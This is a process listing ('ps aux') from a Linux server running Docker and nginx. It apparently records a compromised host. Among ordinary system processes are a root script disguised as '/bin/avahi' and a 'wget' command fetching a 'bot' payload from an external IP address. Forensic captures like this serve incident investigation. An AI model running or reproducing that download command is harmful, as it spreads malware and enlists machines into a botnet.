USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.2  0.6  56972  6748 ?        Ss   11:19   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    11:19   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    11:19   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    11:19   0:00 [kworker/0:0]
root         5  0.0  0.0      0     0 ?        S<   11:19   0:00 [kworker/0:0H]
root         6  0.0  0.0      0     0 ?        S    11:19   0:00 [kworker/u2:0]
root         7  0.0  0.0      0     0 ?        S    11:19   0:00 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    11:19   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    11:19   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S<   11:19   0:00 [lru-add-drain]
root        11  0.0  0.0      0     0 ?        S    11:19   0:00 [watchdog/0]
root        12  0.0  0.0      0     0 ?        S    11:19   0:00 [cpuhp/0]
root        13  0.0  0.0      0     0 ?        S    11:19   0:00 [kdevtmpfs]
root        14  0.0  0.0      0     0 ?        S<   11:19   0:00 [netns]
root        15  0.0  0.0      0     0 ?        S    11:19   0:00 [khungtaskd]
root        16  0.0  0.0      0     0 ?        S    11:19   0:00 [oom_reaper]
root        17  0.0  0.0      0     0 ?        S<   11:19   0:00 [writeback]
root        18  0.0  0.0      0     0 ?        S    11:19   0:00 [kcompactd0]
root        19  0.0  0.0      0     0 ?        SN   11:19   0:00 [ksmd]
root        20  0.0  0.0      0     0 ?        S    11:19   0:00 [kworker/0:1]
root        21  0.0  0.0      0     0 ?        SN   11:19   0:00 [khugepaged]
root        22  0.0  0.0      0     0 ?        S<   11:19   0:00 [crypto]
root        23  0.0  0.0      0     0 ?        S<   11:19   0:00 [kintegrityd]
root        24  0.0  0.0      0     0 ?        S<   11:19   0:00 [bioset]
root        25  0.0  0.0      0     0 ?        S<   11:19   0:00 [kblockd]
root        26  0.0  0.0      0     0 ?        S<   11:19   0:00 [devfreq_wq]
root        27  0.0  0.0      0     0 ?        S<   11:19   0:00 [watchdogd]
root        28  0.0  0.0      0     0 ?        S    11:19   0:00 [kswapd0]
root        29  0.0  0.0      0     0 ?        S<   11:19   0:00 [vmstat]
root        41  0.0  0.0      0     0 ?        S<   11:19   0:00 [kthrotld]
root        42  0.0  0.0      0     0 ?        S<   11:19   0:00 [ipv6_addrconf]
root        79  0.0  0.0      0     0 ?        S<   11:19   0:00 [ata_sff]
root        82  0.0  0.0      0     0 ?        S    11:19   0:00 [kworker/u2:1]
root        83  0.0  0.0      0     0 ?        S    11:19   0:00 [kworker/0:2]
root       103  0.0  0.0      0     0 ?        S    11:19   0:00 [scsi_eh_0]
root       104  0.0  0.0      0     0 ?        S<   11:19   0:00 [scsi_tmf_0]
root       105  0.0  0.0      0     0 ?        S    11:19   0:00 [scsi_eh_1]
root       106  0.0  0.0      0     0 ?        S<   11:19   0:00 [scsi_tmf_1]
root       107  0.0  0.0      0     0 ?        S    11:19   0:00 [scsi_eh_2]
root       108  0.0  0.0      0     0 ?        S<   11:19   0:00 [scsi_tmf_2]
root       109  0.0  0.0      0     0 ?        R    11:19   0:00 [kworker/u2:2]
root       110  0.0  0.0      0     0 ?        S    11:19   0:00 [kworker/u2:3]
root       111  0.0  0.0      0     0 ?        S<   11:19   0:00 [bioset]
root       112  0.0  0.0      0     0 ?        S<   11:19   0:00 [bioset]
root       114  0.0  0.0      0     0 ?        S<   11:19   0:00 [kworker/0:1H]
root       116  0.2  0.0      0     0 ?        S    11:19   0:00 [kworker/0:3]
root       142  0.0  0.0      0     0 ?        S<   11:19   0:00 [kworker/u3:0]
root       151  0.0  0.0      0     0 ?        S    11:19   0:00 [jbd2/sda1-8]
root       152  0.0  0.0      0     0 ?        S<   11:19   0:00 [ext4-rsv-conver]
root       180  0.0  0.4  39176  4720 ?        Ss   11:19   0:00 /lib/systemd/systemd-journald
root       184  0.0  0.0      0     0 ?        S    11:19   0:00 [kauditd]
root       187  0.0  0.0      0     0 ?        S    11:19   0:00 [kworker/0:4]
root       191  0.0  0.4  45980  4104 ?        Ss   11:19   0:00 /lib/systemd/systemd-udevd
systemd+   241  0.0  0.4 127284  4164 ?        Ssl  11:19   0:00 /lib/systemd/systemd-timesyncd
message+   360  0.0  0.3  45120  3760 ?        Ss   11:19   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
root       365  0.0  0.4  46520  4848 ?        Ss   11:19   0:00 /lib/systemd/systemd-logind
root       366  0.0  0.0   5828   660 ?        Ss   11:19   0:00 /usr/sbin/anacron -dsq
root       367  0.0  0.2  29664  2912 ?        Ss   11:19   0:00 /usr/sbin/cron -f
root       369  0.0  0.3 250112  3260 ?        Ssl  11:19   0:00 /usr/sbin/rsyslogd -n
root       371  0.0  3.9 463104 40084 ?        Ssl  11:19   0:00 /usr/bin/containerd
root       374  0.1  6.5 439456 67048 ?        Ssl  11:19   0:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root       375  0.0  0.1 159532  1620 ?        Ss   11:19   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data   376  0.0  0.3 159868  3248 ?        S    11:19   0:00 nginx: worker process
root       377  0.0  0.2  52956  2848 ?        S    11:19   0:00 /usr/sbin/CRON -f
root       385  0.0  0.3  71884  3344 tty1     Ss   11:19   0:00 /bin/login --
root       386  0.0  0.0   4276   708 ?        Ss   11:19   0:00 /bin/sh -c /bin/avahi
root       387  0.0  0.2  11164  2852 ?        S    11:19   0:00 /bin/bash /bin/avahi
root       417  0.0  0.1  20352  1032 ?        Ss   11:19   0:00 /sbin/dhclient -4 -v -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
root       583  0.0  0.5  56392  5956 ?        Ss   11:19   0:00 /lib/systemd/systemd --user
root       584  0.0  0.1  84440  1520 ?        S    11:19   0:00 (sd-pam)
root       587  0.0  0.5  21336  5132 tty1     S+   11:19   0:00 -bash
root       596  0.0  0.4  44876  4540 ?        S    11:19   0:00 wget http://37.46.128.71/bot
root       605  0.0  0.5  69952  5484 ?        Ss   11:22   0:00 /usr/sbin/sshd -D
root       608  0.0  0.6  99348  6888 ?        Ss   11:23   0:00 sshd: root@pts/0
root       614  0.0  0.5  21304  5228 pts/0    Ss   11:23   0:00 -bash
root       620  0.0  0.3  38304  3272 pts/0    R+   11:23   0:00 ps aux
